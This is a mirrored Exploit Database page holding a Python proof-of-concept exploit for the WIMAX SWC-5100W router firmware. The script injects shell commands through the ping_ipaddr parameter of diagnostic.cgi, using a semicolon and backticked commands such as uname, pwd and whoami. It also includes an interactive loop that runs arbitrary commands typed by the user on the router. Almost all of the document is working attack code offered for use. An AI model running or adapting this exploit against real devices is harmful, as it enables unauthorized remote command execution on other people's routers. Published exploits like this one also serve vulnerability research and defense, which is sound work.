WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) – Authenticated RCE

• Exploit Database
• 109 阅读

• 作者： Momen Eldawakhly
  日期： 2023-04-06
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51311/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96

  # Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE # Vulnerability Name: Ballin&apos; Mada # Date: 4/3/2023 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.seowonintech.co.kr/eng/main # Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4) # Tested on: Unix # CVE : Under registration   import requests import random,argparse import sys from colorama import Fore from bs4 import BeautifulSoup   red = Fore.RED green = Fore.GREEN cyan = Fore.CYAN yellow = Fore.YELLOW reset = Fore.RESET   argParser = argparse.ArgumentParser() argParser.add_argument("-t", "--target", help="Target router") argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action=&apos;store_true&apos;) argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action=&apos;store_true&apos;)   args = argParser.parse_args() target = args.target rev = args.reverseShell testX = args.testExploit     banner = """ ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ ||B |||a |||l |||l |||i |||n |||&apos; ||| |||M |||a |||d |||a || ||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\| RCE 0day in WIMAX SWC-5100W [ Spell the CGI as in Cyber Guy ] """ def checkEXP(): print(cyan + "[+] Checking if target is vulnerable" + reset) art = [&apos;PWNED_1EE7&apos;, &apos;CGI AS IN CYBER GUY&apos;] request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo &apos;PUTS("+random.choice(art)+")&apos;;", proxies=None) if request.status_code == 200: print(green + "[+] Status code: 200 success" + reset) soup = BeautifulSoup(request.text, &apos;html.parser&apos;) if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"): print(green + "[+] Target is vulnerable" + reset) uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id=&apos;pwned&apos;>[*] Kernel: <code>uname+-a</code> -=-=- [*] Current directory: <code>pwd</code> -=-=- [*] User: <code>whoami</code></a>\";") soup_validate = BeautifulSoup(uname.text, &apos;html.parser&apos;) print(soup_validate.find(id="pwned").text) else: print(red + "[+] Seems to be not vulnerable" + reset) else: print(red + "[+] Status code: " + str(request.status_code) + reset)     def revShell(): cmd = input("CGI #:- ") while cmd: try: print(cmd) uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id=&apos;result&apos;><code>{cmd}</code></a>\";") resp = BeautifulSoup(uname.text, &apos;html.parser&apos;) print(resp.find(id="result").text) if cmd == "exit" or cmd == "quit": print(yellow + "[*] Terminating ..." + reset) sys.exit(0) else: return revShell() except KeyboardInterrupt: sys.exit(0)   def help(): print( """ [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv   [*] -t, --target :: Specify target to attack. [*] -rv, --reverseShell :: Obtain reverse shell. [*] -tx, --testExploit :: Test the exploitability of the target. [*] -fz, --fuzz :: Fuzz the target with arbitrary chars. """ )   if target and rev: print(banner) revShell() elif target and testX: print(banner) checkEXP() else: print(banner) argParser.print_help()